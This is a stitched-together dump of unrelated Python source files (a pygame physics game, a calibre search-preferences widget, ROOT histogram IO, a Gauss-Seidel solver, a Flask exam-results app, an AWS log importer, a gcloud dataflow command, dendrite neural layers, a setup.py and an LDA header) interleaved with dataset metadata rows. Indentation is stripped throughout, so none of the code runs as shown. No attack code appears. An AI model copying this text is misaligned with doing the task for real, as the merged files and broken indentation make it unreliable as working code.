# Ten Second Balls
# Copyright (C) 2013 Iain Learmonth
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
import pygame
from pygame.locals import *
from pygame.color import *
import pymunk
from pymunk.pygame_util import draw_space
class Universe:
def __init__(self, level):
# Initialisation
pygame.init()
self.screen = pygame.display.set_mode((600, 600))
pygame.display.set_caption("Ludum Dare 27 - 10 Seconds - A thing by irl")
self.clock = pygame.time.Clock()
self.won = self.lost = False
# Set up space
self.space = space = pymunk.Space()
space.gravity = (0.0, -900.0)
# Set up walls
space.add(level.get_universe_walls(space))
space.add_collision_handler(2, 3, post_solve=self.activate_bomb)
space.add_collision_handler(1, 2, post_solve=self.win)
# Set up blocks
for block in level.blocks:
x, y = block
self.add_block(x, y)
# Set up finish
x, y = level.finish
self.add_finish(x, y)
def add_block(self, x, y):
inertia = pymunk.moment_for_circle(1, 0, 14, (0,0))
body = pymunk.Body(1, inertia)
shape = pymunk.Circle(body, 14)
body.position = x, y
shape.collision_type = 3
shape.color = THECOLORS['purple']
self.space.add(body, shape)
return shape
def add_finish(self, x, y):
body = pymunk.Body(pymunk.inf, pymunk.inf)
shape = pymunk.Circle(body, 25)
body.position = x, y
shape.collision_type = 1
shape.color = THECOLORS['yellow']
self.space.add(body, shape)
def tick(self):
self.screen.fill(THECOLORS['black'])
draw_space(self.screen, self.space)
self.space.step(1/50.0)
pygame.display.flip()
self.clock.tick(50)
dead_blocks = []
for shape in self.space.shapes:
if shape.collision_type > 5:
shape.collision_type -= 1
if shape.collision_type == 5:
dead_blocks.append(shape)
for shape in dead_blocks:
self.space.remove(shape)
def win(self, space, arbiter):
print "YOU WIN!"
self.won = True
def activate_bomb(self, space, arbiter):
print "Bomb activated"
for shape in arbiter.shapes:
if shape.collision_type == 3:
shape.collision_type = 600
shape.color = THECOLORS['red']
| gpl-2.0 | 5,359,474,104,752,281,000 | 30.57 | 81 | 0.616408 | false | 3.579365 | false | false | false |
CasparLi/calibre | src/calibre/gui2/preferences/search.py | 14 | 10956 | #!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
__license__ = 'GPL v3'
__copyright__ = '2010, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
from PyQt5.Qt import QApplication
from calibre.gui2.preferences import ConfigWidgetBase, test_widget, \
CommaSeparatedList
from calibre.gui2.preferences.search_ui import Ui_Form
from calibre.gui2 import config, error_dialog, gprefs
from calibre.utils.config import prefs
from calibre.utils.icu import sort_key
from calibre.library.caches import set_use_primary_find_in_search
class ConfigWidget(ConfigWidgetBase, Ui_Form):
def genesis(self, gui):
self.gui = gui
db = gui.library_view.model().db
self.db = db
r = self.register
r('search_as_you_type', config)
r('highlight_search_matches', config)
r('show_highlight_toggle_button', gprefs)
r('limit_search_columns', prefs)
r('use_primary_find_in_search', prefs)
r('limit_search_columns_to', prefs, setting=CommaSeparatedList)
fl = db.field_metadata.get_search_terms()
self.opt_limit_search_columns_to.update_items_cache(fl)
self.clear_history_button.clicked.connect(self.clear_histories)
self.gst_explanation.setText('<p>' + _(
"<b>Grouped search terms</b> are search names that permit a query to automatically "
"search across more than one column. For example, if you create a grouped "
"search term <code>allseries</code> with the value "
"<code>series, #myseries, #myseries2</code>, then "
"the query <code>allseries:adhoc</code> will find 'adhoc' in any of the "
"columns <code>series</code>, <code>#myseries</code>, and "
"<code>#myseries2</code>.<p> Enter the name of the "
"grouped search term in the drop-down box, enter the list of columns "
"to search in the value box, then push the Save button. "
"<p>Note: Search terms are forced to lower case; <code>MySearch</code> "
"and <code>mysearch</code> are the same term."
"<p>You can have your grouped search term show up as user categories in "
" the Tag Browser. Just add the grouped search term names to the Make user "
"categories from box. You can add multiple terms separated by commas. "
"The new user category will be automatically "
"populated with all the items in the categories included in the grouped "
"search term. <p>Automatic user categories permit you to see easily "
"all the category items that "
"are in the columns contained in the grouped search term. Using the above "
"<code>allseries</code> example, the automatically-generated user category "
"will contain all the series mentioned in <code>series</code>, "
"<code>#myseries</code>, and <code>#myseries2</code>. This "
"can be useful to check for duplicates, to find which column contains "
"a particular item, or to have hierarchical categories (categories "
"that contain categories)."))
self.gst = db.prefs.get('grouped_search_terms', {}).copy()
self.orig_gst_keys = self.gst.keys()
fl = []
for f in db.all_field_keys():
fm = db.metadata_for_field(f)
if not fm['search_terms']:
continue
if not fm['is_category']:
continue
fl.append(f)
self.gst_value.update_items_cache(fl)
self.fill_gst_box(select=None)
self.category_fields = fl
ml = [(_('Match any'), 'match_any'), (_('Match all'), 'match_all')]
r('similar_authors_match_kind', db.prefs, choices=ml)
r('similar_tags_match_kind', db.prefs, choices=ml)
r('similar_series_match_kind', db.prefs, choices=ml)
r('similar_publisher_match_kind', db.prefs, choices=ml)
self.set_similar_fields(initial=True)
self.similar_authors_search_key.currentIndexChanged[int].connect(self.something_changed)
self.similar_tags_search_key.currentIndexChanged[int].connect(self.something_changed)
self.similar_series_search_key.currentIndexChanged[int].connect(self.something_changed)
self.similar_publisher_search_key.currentIndexChanged[int].connect(self.something_changed)
self.gst_delete_button.setEnabled(False)
self.gst_save_button.setEnabled(False)
self.gst_names.currentIndexChanged[int].connect(self.gst_index_changed)
self.gst_names.editTextChanged.connect(self.gst_text_changed)
self.gst_value.textChanged.connect(self.gst_text_changed)
self.gst_save_button.clicked.connect(self.gst_save_clicked)
self.gst_delete_button.clicked.connect(self.gst_delete_clicked)
self.gst_changed = False
if db.prefs.get('grouped_search_make_user_categories', None) is None:
db.new_api.set_pref('grouped_search_make_user_categories', [])
r('grouped_search_make_user_categories', db.prefs, setting=CommaSeparatedList)
self.muc_changed = False
self.opt_grouped_search_make_user_categories.lineEdit().editingFinished.connect(
self.muc_box_changed)
def set_similar_fields(self, initial=False):
self.set_similar('similar_authors_search_key', initial=initial)
self.set_similar('similar_tags_search_key', initial=initial)
self.set_similar('similar_series_search_key', initial=initial)
self.set_similar('similar_publisher_search_key', initial=initial)
def set_similar(self, name, initial=False):
field = getattr(self, name)
if not initial:
val = field.currentText()
else:
val = self.db.prefs[name]
field.blockSignals(True)
field.clear()
choices = []
choices.extend(self.category_fields)
choices.extend(sorted(self.gst.keys(), key=sort_key))
field.addItems(choices)
dex = field.findText(val)
if dex >= 0:
field.setCurrentIndex(dex)
else:
field.setCurrentIndex(0)
field.blockSignals(False)
def something_changed(self, dex):
self.changed_signal.emit()
def muc_box_changed(self):
self.muc_changed = True
def gst_save_clicked(self):
idx = self.gst_names.currentIndex()
name = icu_lower(unicode(self.gst_names.currentText()))
if not name:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('The search term cannot be blank'),
show=True)
if idx != 0:
orig_name = unicode(self.gst_names.itemData(idx) or '')
else:
orig_name = ''
if name != orig_name:
if name in self.db.field_metadata.get_search_terms() and \
name not in self.orig_gst_keys:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('That name is already used for a column or grouped search term'),
show=True)
if name in [icu_lower(p) for p in self.db.prefs.get('user_categories', {})]:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('That name is already used for user category'),
show=True)
val = [v.strip() for v in unicode(self.gst_value.text()).split(',') if v.strip()]
if not val:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('The value box cannot be empty'), show=True)
if orig_name and name != orig_name:
del self.gst[orig_name]
self.gst_changed = True
self.gst[name] = val
self.fill_gst_box(select=name)
self.set_similar_fields(initial=False)
self.changed_signal.emit()
def gst_delete_clicked(self):
if self.gst_names.currentIndex() == 0:
return error_dialog(self.gui, _('Grouped Search Terms'),
_('The empty grouped search term cannot be deleted'), show=True)
name = unicode(self.gst_names.currentText())
if name in self.gst:
del self.gst[name]
self.fill_gst_box(select='')
self.changed_signal.emit()
self.gst_changed = True
self.set_similar_fields(initial=False)
def fill_gst_box(self, select=None):
terms = sorted(self.gst.keys(), key=sort_key)
self.opt_grouped_search_make_user_categories.update_items_cache(terms)
self.gst_names.blockSignals(True)
self.gst_names.clear()
self.gst_names.addItem('', '')
for t in terms:
self.gst_names.addItem(t, t)
self.gst_names.blockSignals(False)
if select is not None:
if select == '':
self.gst_index_changed(0)
elif select in terms:
self.gst_names.setCurrentIndex(self.gst_names.findText(select))
def gst_text_changed(self):
self.gst_delete_button.setEnabled(False)
self.gst_save_button.setEnabled(True)
def gst_index_changed(self, idx):
self.gst_delete_button.setEnabled(idx != 0)
self.gst_save_button.setEnabled(False)
self.gst_value.blockSignals(True)
if idx == 0:
self.gst_value.setText('')
else:
name = unicode(self.gst_names.itemData(idx) or '')
self.gst_value.setText(','.join(self.gst[name]))
self.gst_value.blockSignals(False)
def commit(self):
if self.gst_changed:
self.db.new_api.set_pref('grouped_search_terms', self.gst)
self.db.field_metadata.add_grouped_search_terms(self.gst)
self.db.new_api.set_pref('similar_authors_search_key',
unicode(self.similar_authors_search_key.currentText()))
self.db.new_api.set_pref('similar_tags_search_key',
unicode(self.similar_tags_search_key.currentText()))
self.db.new_api.set_pref('similar_series_search_key',
unicode(self.similar_series_search_key.currentText()))
self.db.new_api.set_pref('similar_publisher_search_key',
unicode(self.similar_publisher_search_key.currentText()))
return ConfigWidgetBase.commit(self)
def refresh_gui(self, gui):
set_use_primary_find_in_search(prefs['use_primary_find_in_search'])
gui.set_highlight_only_button_icon()
if self.muc_changed:
gui.tags_view.recount()
gui.search.search_as_you_type(config['search_as_you_type'])
gui.search.do_search()
def clear_histories(self, *args):
for key, val in config.defaults.iteritems():
if key.endswith('_search_history') and isinstance(val, list):
config[key] = []
self.gui.search.clear_history()
if __name__ == '__main__':
app = QApplication([])
test_widget('Interface', 'Search')
| gpl-3.0 | -4,870,056,115,032,629,000 | 43.901639 | 98 | 0.622855 | false | 3.755914 | true | false | false |
andreadotti/StatTest | ROOTIO.py | 1 | 6085 | """
ROOT interfaces and utilities
"""
from Utils import WrongDataType,Error,logger
_logger=logger().getLogger('Interface')
def stripPathName( aPath ):
"""
Remove file name identifier and trailing / from ROOT
TDirectory path
"""
return aPath.GetPath()[aPath.GetPath().find(":")+1:].rstrip('/')
def readDirectory( tdir ):
"""
Recursively read content of ROOT's TDirectory tdir
and add full pathnames to outputlist
"""
outputlist=[]
from ROOT import TIter
nextkey = TIter( tdir.GetListOfKeys() )
key = nextkey()
while key:
obj = key.ReadObj()
if obj.IsA().InheritsFrom("TH1") or obj.IsA().InheritsFrom("TTree"):
curdirname = stripPathName(tdir)
if len(curdirname)>0:
objpath = "%s/%s"%(stripPathName(tdir),obj.GetName())
else:
objpath = obj.GetName()
#print obj.GetName()," :-> ",objpath
outputlist.append( objpath )
elif obj.IsA().InheritsFrom("TDirectory"):
from ROOT import gDirectory
#print gDirectory.GetPath(),obj.GetName(),obj.GetPath()
outputlist += readDirectory( obj )
key=nextkey()
return outputlist
def checkTreeHasBranch( fileobj , treename , branchnane ):
"""
Check if Tree with name treename contained in TFile fileobj,
has a TBranch with name matching the regular expression branchname.
If found returns the name of the branch, otherwise None.
Note: Returns the first occurance of a branch matching the re
"""
thetree=fileobj.Get(treename)
if not thetree.IsA().InheritsFrom("TTree"):
return None
import re
mm=re.compile("^%s$"%branchnane)
for bridx in range(thetree.GetNbranches()):
candidate = thetree.GetListOfBranches()[bridx].GetName()
if mm.match( candidate ):
return candidate
return None
def buildUnbinnedInputs(tfile,paths):
"""
Creates and returns a list of StatTest.IO.Branch objects
corresponding to the specified list of tuples (treename, branchname,conf)
"""
inputs=[]
from IO import Branch
from Interface import Configuration
for treename,branchname,conf in paths:
#print treename,branchname,conf #########################
#print 'Creo Branch in file: ',tfile,' Da Tree.Branch: ',treename,branchname,
#print 'Typo container: ',conf[Configuration.TYPEKEY],' Di dimensione: ',conf[Configuration.SIZEKEY]
if conf.has_key(Configuration.ELEMENTKEY):
un = Branch( tfile , treename , branchname ,
Branch.BranchType.stringToValue( conf[Configuration.TYPEKEY] ),
conf[Configuration.SIZEKEY],
conf[Configuration.ELEMENTKEY])
else:
un = Branch( tfile , treename , branchname ,
Branch.BranchType.stringToValue( conf[Configuration.TYPEKEY] ),
conf[Configuration.SIZEKEY])
un.name = "%s:%s"%(treename,branchname)
inputs.append( un )
return inputs
def buildHistogramInputs( tfile, paths ):
"""
Creates and returns a list of StatTest.IO.Histogram objects
correponding to the specified list of paths
"""
inputs = []
from IO import Histogram
for objectname in paths:
try:
hh = Histogram(tfile,objectname)
hh.name = objectname
inputs.append( hh )
except WrongDataType:
#Not an histogram, skip
pass
return inputs
def makePage( algorithm , pagename , prefix=""):
from ROOT import TCanvas,kBlue,kRed,gROOT,kGreen,kYellow,kBlack
gROOT.SetBatch(True)
c=TCanvas( algorithm.output.name , algorithm.output.name )
c.Divide(1,2)
from Interface import Result
aColor = None
if algorithm.output.result == Result.FAILED:
aColor = kRed
if algorithm.output.result == Result.NOTPASSED:
aColor = kYellow
if algorithm.output.result == Result.SUCCESS:
aColor = kGreen
if algorithm.output.result == Result.UNDEFINED:
aColor = kBlack
if aColor:
c.SetFillColor( aColor )
aPad = c.cd(1)
if algorithm.output.logx:
aPad.SetLogx()
if algorithm.output.logy:
aPad.SetLogy()
from Utils import draw
_logger.info("Printing report..2.")
lims = ()
if "TH1" not in algorithm.test.dataset1.__class__.__name__:
lims = ( 100,
min( algorithm.test.dataset1.tolist() + algorithm.test.dataset2.tolist() ),
max( algorithm.test.dataset1.tolist() + algorithm.test.dataset2.tolist() )
)
if algorithm.output.logx and lims[1]<=0:
lims[1] = 1e-10
h1=draw( algorithm.test.dataset1 , kBlue , "" , lims , algorithm.output.name, algorithm.output.logx )
h2=draw( algorithm.test.dataset2 , kRed , "same", lims , algorithm.output.name+"ref", algorithm.output.logx )
from ROOT import TPaveText
pave=TPaveText(0.02,0.85,0.35,0.99,"NDC")
pave.SetTextColor(aColor)
pave.SetFillColor(1)
pave.AddText(" %s "%algorithm.output.result)
pave.AddText("(p-val: %s Test: %s)"%(algorithm.output.value,
algorithm.test.__class__.__name__))
pave.Draw()
aPad = c.cd(2)
if algorithm.output.logx:
aPad.SetLogx()
if 'residuals' in algorithm.test.__dict__:
algorithm.test.residuals.Draw()
else:
from Utils import makeResiduals
algorithm.test.residuals = makeResiduals( h1 , h2 )
algorithm.test.residuals.Draw()
c.Print(pagename+prefix)
def testme( filename="AtlasECAL_pi-_100_QGSP_BERT_95ref02.root" ):
"""
Test function
"""
from ROOT import TFile
f=TFile.Open(filename)
output=readDirectory( f )
for name in output:
print "Full path name: %s for object of name: %s and type: %s"%(name,f.Get(name).GetName(),f.Get(name).IsA().GetName())
#print output
return buildHistogramInputs(f, output )
| gpl-2.0 | -231,493,088,138,147,040 | 35.656627 | 127 | 0.618406 | false | 3.760816 | true | false | false |
DavideCanton/Python3 | num/gauss-seidel.py | 1 | 2710 | __author__ = 'davide'
import numpy as np
from collections import deque
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy.random as nprand
class Solver:
def __init__(self, start_x=None):
self.done = False
self.x = start_x
self.it = None
def set_params(self, A, b):
self.A = A
self.b = b
def _iterate(self):
d = len(b)
if self.x is None:
self.x = np.zeros(d)
while not self.done:
xn = np.zeros(d)
for i in range(d):
xn[i] = Solver.compute_x(i, self.x, xn,
self.A[i], self.b[i])
self.x = xn
yield xn
def iterate_sol(self):
yield from self._iterate()
def reset(self):
self.done = False
def end(self):
self.done = True
@staticmethod
def compute_x(i, x_old, x_new, row, b):
s1 = np.dot(row[:i], x_new[:i])
s2 = np.dot(row[i + 1:], x_old[i + 1:])
return (b - s1 - s2) / row[i]
def not_stable(A):
M = np.tril(A)
N = np.triu(A)
N[np.diag_indices_from(N)] = 0.
B = np.dot(np.linalg.inv(M), -N)
l, _ = np.linalg.eig(B)
return max(abs(l)) >= 1
if __name__ == "__main__":
N = 3
b = nprand.rand(N, 1) * 10 - 5
while True:
A = nprand.rand(N, N) * 10 - 5
if np.count_nonzero(A) == 0:
exit("Matrice nulla")
# if 0 in np.diag(A):
# print("Scambio")
# A = A[[1, 0]]
# if not_stable(A):
# exit("Metodo non stabile")
# print("Non stabile!")
if not not_stable(A):
break
print("A matrix:")
print(A)
print("rhs vector:")
print(b)
start_x = b
s = Solver(start_x)
s.set_params(A, b)
x, y, z = [], [], []
P = 10
L = deque([start_x], maxlen=P)
for rx, _ in zip(s.iterate_sol(), range(100000)):
last = L[-1]
L.append(rx)
x.append(rx[0])
y.append(rx[1])
try:
z.append(rx[2])
except IndexError:
z.append(0)
if np.allclose(last, rx):
break
s.end()
sol = L[-1]
print("Solution:")
print(sol)
error = np.dot(A, sol) - b
print("Error:")
print(error)
if np.linalg.norm(error) > 1e8:
print("ERROR!")
fig = plt.figure()
plt.title(
"Iteration of Gauss-Seidel Method with A={} and b={}".format(A, b))
ax = fig.add_subplot(111, projection='3d')
ax.plot(x, y, z, "bo-")
plt.show() | gpl-3.0 | 515,264,414,718,476,800 | 20.983051 | 75 | 0.460148 | false | 3.125721 | false | false | false |
iashwinprasada/VTU-Profiler | views.py | 1 | 1765 | from ResultBackEnd import resultlogic, USNValidate
from flask import Flask, request, flash, url_for, redirect, render_template, abort
import json
app=Flask(__name__)
app.config.from_pyfile('AppConfig.cfg')
app.config['PROPAGATE_EXCEPTIONS'] = True
@app.route('/result',methods=['GET', 'POST'])
def result():
return render_template('result.html')
@app.route('/', methods=['GET', 'POST'])
@app.route('/index', methods=['GET', 'POST'])
def index():
error = None
if request.method == 'POST':
U = request.form['USN']
u1 = USNValidate.USN(U)
if u1.isValidUSN() == False:
error = u1.getErrors()
flash (error)
else:
marks,usn_name = resultlogic.get_result(U)
sub=marks[0]
subjects_vtu = []
marks_ext = []
marks_int = []
total_sub = []
for i in range(0,len(marks)):
#print "Subject \n"
subjects_vtu.append(marks[i][0])
#print "Marks \n"
marks_ext.append(int(marks[i][1]))
marks_int.append(int(marks[i][2]))
total_sub.append(marks_int[i]+marks_ext[i])
int_sum_per = (sum(x for x in marks_int))
ext_sum_per = (sum(x for x in marks_ext))
# usn_name= "namehere"
usn_college=u1.college
usn_reg= u1.region
usn_branch=u1.stream
return render_template('result.html',name=usn_name,college=usn_college,region=usn_reg,branch=usn_branch,n=range(len(marks)), sub=subjects_vtu,extr=marks_ext,intr=marks_int,extpr=ext_sum_per,intpr=int_sum_per,tot=total_sub)
return render_template('main.html', error=error)
if __name__ == "__main__":
app.run()
| gpl-2.0 | 3,172,918,091,581,324,300 | 36.553191 | 234 | 0.567705 | false | 3.238532 | false | false | false |
riolet/SAM | sam/importers/import_aws.py | 2 | 1595 | import sys
from sam.importers.import_base import BaseImporter
import datetime
class AWSImporter(BaseImporter):
def translate(self, line, line_num, dictionary):
"""
Converts a given syslog line into a dictionary of (ip, port, ip, port)
Args:
line: The syslog line to parse
line_num: The line number, for error printouts
dictionary: The dictionary to write key/values pairs into
Returns:
0 on success and non-zero on error.
"""
try:
awsLog = line.split(" ")
dictionary['src'] = self.ip_to_int(*(awsLog[3].split(".")))
dictionary['srcport'] = int(awsLog[5])
dictionary['dst'] = self.ip_to_int(*(awsLog[4].split(".")))
dictionary['dstport'] = int(awsLog[6])
dictionary['timestamp'] = datetime.datetime.fromtimestamp((float(awsLog[10])))
# TODO: the following is placeholder.
# Needed: test data or spec to read
dictionary['protocol'] = 'TCP'.upper()
dictionary['duration'] = '1'
dictionary['bytes_received'] = '1'
dictionary['bytes_sent'] = '1'
dictionary['packets_received'] = '1'
dictionary['packets_sent'] = '1'
except:
return 1
return 0
class_ = AWSImporter
# If running as a script, begin by executing main.
if __name__ == "__main__":
sys.stderr.write("Warning: This importer is incomplete and uses empty data for some fields.")
importer = class_()
importer.main(sys.argv)
| gpl-3.0 | 7,908,484,718,748,201,000 | 34.444444 | 97 | 0.576176 | false | 4.153646 | false | false | false |
Sorsly/subtle | google-cloud-sdk/lib/surface/dataflow/jobs/run.py | 6 | 2918 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of gcloud dataflow jobs run command.
"""
from googlecloudsdk.api_lib.dataflow import apis
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import properties
@base.ReleaseTracks(base.ReleaseTrack.BETA, base.ReleaseTrack.GA)
class Run(base.Command):
"""Runs a job from the specified path.
"""
@staticmethod
def Args(parser):
"""Register flags for this command.
Args:
parser: argparse.ArgumentParser to register arguments with.
"""
parser.add_argument(
'job_name',
metavar='JOB_NAME',
help='The unique name to assign to the job.')
parser.add_argument(
'--gcs-location',
help='The location of the job template to run.',
required=True)
parser.add_argument(
'--zone',
type=arg_parsers.RegexpValidator(
r'\w+-\w+\d-\w', 'must provide a valid zone'),
help='The zone to run the workers in.')
parser.add_argument(
'--service-account-email',
type=arg_parsers.RegexpValidator(
r'.*@.*\..*', 'must provide a valid email address'),
help='The service account to run the workers as.')
parser.add_argument(
'--max-workers',
type=int,
help='The maximum number of workers to run.')
parser.add_argument(
'--parameters',
metavar='PARAMETERS',
type=arg_parsers.ArgDict(),
action=arg_parsers.UpdateAction,
help='The parameters to pass to the job.')
def Run(self, args):
"""Runs the command.
Args:
args: The arguments that were provided to this command invocation.
Returns:
A Job message.
"""
if not args.gcs_location.startswith('gs://'):
raise exceptions.ToolException("""\
--gcs-location must begin with 'gs://'. Provided value was '{value}'.
""".format(value=args.gcs_location))
job = apis.Templates.Create(
project_id=properties.VALUES.core.project.Get(required=True),
gcs_location=args.gcs_location,
job_name=args.job_name,
parameters=args.parameters,
service_account_email=args.service_account_email,
zone=args.zone,
max_workers=args.max_workers)
return job
| mit | 1,607,969,847,129,877,000 | 30.717391 | 74 | 0.668266 | false | 4.041551 | false | false | false |
mrcslws/nupic.research | nupic/research/frameworks/continual_learning/dendrite_layers.py | 3 | 6169 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2020, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
from nupic.research.frameworks.continual_learning.dend_kwinners import (
DendriteKWinners2dLocal,
)
from nupic.torch.modules import SparseWeights
class DendriteInput(nn.Module):
""" Sparse linear layer from previous output to
"dendrites" - this is the first part of a module
that projects via dendrite segments to output units.
:param in_dim: input dimension
:param n_dendrites: total number of dendrites - note this will
be an integer multiple of the number of downstream units
:param threshold: (currently unused) - threshold for an
in-development dendritic activation or gating function
:param weight_sparsity: Weight sparsity of the sparse weights.
If weight_sparsity=1, it will default to a standard linear layer.
"""
def __init__(
self, in_dim, n_dendrites, threshold=2, weight_sparsity=0.2,
):
super(DendriteInput, self).__init__()
self.threshold = threshold
linear = nn.Linear(in_dim, n_dendrites)
if weight_sparsity < 1:
self.linear = SparseWeights(linear, weight_sparsity)
else:
self.linear = linear
def forward(self, x):
""" Note this only returns the linear output """
out = self.linear(x)
return out
class DendriteOutput(nn.Module):
""" Masked linear layer from dendrites to output
units. This is the second part of the full module.
:param out_dim: output dimension (number of downstream units)
:param dendrites_per_unit: integer number of dendrite
segments per unit
"""
def __init__(self, out_dim, dendrites_per_unit):
super(DendriteOutput, self).__init__()
self.dendrites_per_unit = dendrites_per_unit
self.register_buffer("mask", self.dend_mask(out_dim))
self.weight = torch.nn.Parameter(
torch.Tensor(out_dim, dendrites_per_unit * out_dim)
)
self.bias = torch.nn.Parameter(torch.Tensor(out_dim), requires_grad=True)
# for stability - will integrate separate weight init. later
nn.init.kaiming_uniform_(self.weight)
self.bias.data.fill_(0.0)
def forward(self, x):
w = self.weight * self.mask
return F.linear(x, w, self.bias)
def dend_mask(self, out_dim):
"""This creates a mask such that each dendrite
unit only projects to one downstream unit
"""
mask = torch.zeros(out_dim, out_dim)
inds = np.diag_indices(out_dim)
mask[inds[0], inds[1]] = 1.0
out_mask = torch.repeat_interleave(mask, self.dendrites_per_unit, dim=0).T
return out_mask
class DendriteLayer(nn.Module):
""" This is the full module, combining DendriteInput
and DendriteOutput. The module also specifies an
activation function for the dendrite units
(in this case a Kwinners2DLocal).
:param in_dim: input dimension for DendriteInput
:param out_dim: output dimension for DendriteOutput
:param dendrites_per_neuron: dendrites per downstream unit
:param weight_sparsity: DOC
:param act_fun_type
"""
def __init__(
self,
in_dim,
out_dim,
dendrites_per_neuron,
weight_sparsity=0.2,
act_fun_type="kwinner",
):
super(DendriteLayer, self).__init__()
self.dendrites_per_neuron = dendrites_per_neuron
self.n_dendrites = out_dim * self.dendrites_per_neuron
self.out_dim = out_dim
self.act_fun_type = act_fun_type
self.input = DendriteInput(
in_dim=in_dim,
n_dendrites=self.n_dendrites,
weight_sparsity=weight_sparsity,
)
self.output = DendriteOutput(out_dim, self.dendrites_per_neuron)
def forward(self, x, cat_projection=1.0):
""" cat_proj here is an optional argument
for a categorical "feedback" projection to
the dendrite segments
"""
if self.act_fun_type == "kwinner":
return self.forward_kwinner(x, cat_projection)
elif self.act_fun_type == "sigmoid":
return self.forward_sigmoid(x, cat_projection)
else:
raise AssertionError("act_fun_type must be ''kwinner'' or ''sigmoid'' ")
def forward_kwinner(self, x, cat_projection=1.0): # cat_projection = 1.0 is cleaner
""" cat_projection is scalar categorical input
"""
batch_size = x.shape[0]
out0 = self.input(x)
out0 = out0 * cat_projection # will be identity without categorical projection
# if statements introduce bug potential and are slower on GPU
out0_ = out0.reshape(batch_size, self.out_dim, self.dendrites_per_neuron)
out1_ = DendriteKWinners2dLocal.apply(out0_, 1)
out1_1 = out1_.reshape(batch_size, self.out_dim * self.dendrites_per_neuron)
out2 = self.output(out1_1)
return out2
def forward_sigmoid(self, x, cat_projection=1.0):
out0 = self.input(x)
out1_pre = out0 * cat_projection
out1 = torch.sigmoid(out1_pre)
out2 = self.output(out1)
return out2
| agpl-3.0 | -6,019,589,543,891,049,000 | 32.895604 | 88 | 0.641109 | false | 3.714028 | false | false | false |
kapilsaxena33/pyentropy | setup.py | 3 | 2730 | import sys, os
import pyentropy
# BEFORE importing disutils, remove MANIFEST. distutils doesn't properly
# update it when the contents of directories change.
if os.path.exists('MANIFEST'): os.remove('MANIFEST')
from distutils.core import setup
from distutils.extension import Extension
from distutils.command.build_ext import build_ext
from distutils.errors import CCompilerError, DistutilsExecError
extension_build_failed = False
def ext_failed_warning(name):
print ('*'*70+'\n')*3
print """WARNING: The %s extension module could not be
compiled. pyEntropy should run, but the features
present in that file will not be available.
Above is the ouput showing how the compilation
failed."""%name
if sys.platform == 'win32':
print
print """I see you are using Windows. The default
compiler for this platform is the Microsoft Visual
Studio C compiler. However, a free alternative
compiler called mingw can be used instead."""
print
print ('*'*70+'\n')*3
global extension_build_failed
extension_build_failed = True
try:
from gsl_dist.gsl_Extension import gsl_Extension
except DistutilsExecError:
ext_failed_warning('gsl-based')
exts = []
wrap_sources = ['hist_c.c', 'sort_c.c', 'gen_c.c', 'entropy_c.c',
'entropy_nsb_c.cpp', 'wrap.c']
statk_wrap_sources = [os.path.join('pyentropy','statk',x) for x in wrap_sources]
try:
statk_wrap = gsl_Extension("statk.wrap",
sources = statk_wrap_sources,
gsl_min_version=(1,),
python_min_version=(2,5)
)
exts.append(statk_wrap)
except:
pass
class build_ext_allow_fail( build_ext ):
# This class allows C extension building to fail.
# Taken from visionegg (LGPL)
# http://github.com/visionegg/visionegg/blob/master/setup.py
# http://www.visionegg.org/
def build_extension(self, ext):
try:
build_ext.build_extension(self, ext)
except CCompilerError, x:
ext_failed_warning(ext.name)
setup(name='pyentropy',
version=pyentropy.__version__,
description='Entropy and Information Theoretic Estimates',
author=pyentropy.__author__,
author_email='[email protected]',
url='http://code.google.com/p/pyentropy',
packages=['pyentropy','pyentropy.tests','pyentropy.statk'],
ext_package='pyentropy',
ext_modules=exts,
cmdclass={'build_ext':build_ext_allow_fail}
)
if extension_build_failed:
print ('*'*70+'\n')*3
print """WARNING: Building of some extensions failed. Please
see the messages above for details.\n"""
print ('*'*70+'\n')*3
| gpl-2.0 | -4,004,113,109,979,347,500 | 30.022727 | 80 | 0.651282 | false | 3.699187 | false | false | false |
abhinavgupta/YALDA | lda.py | 1 | 12462 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Latent Dirichlet Allocation + collapsed Gibbs sampling
# This code is available under the MIT License.
# (c)2010-2011 Nakatani Shuyo / Cybozu Labs Inc.
# UPDATES:
# -Parallelisation of the Gibbs Sampler
# -Online Processing of Documents
# Related Paper:
# -On-line Trend Analysis with Topic Models: #twitter trends detection topic model online
# (COLING 2012)
import numpy
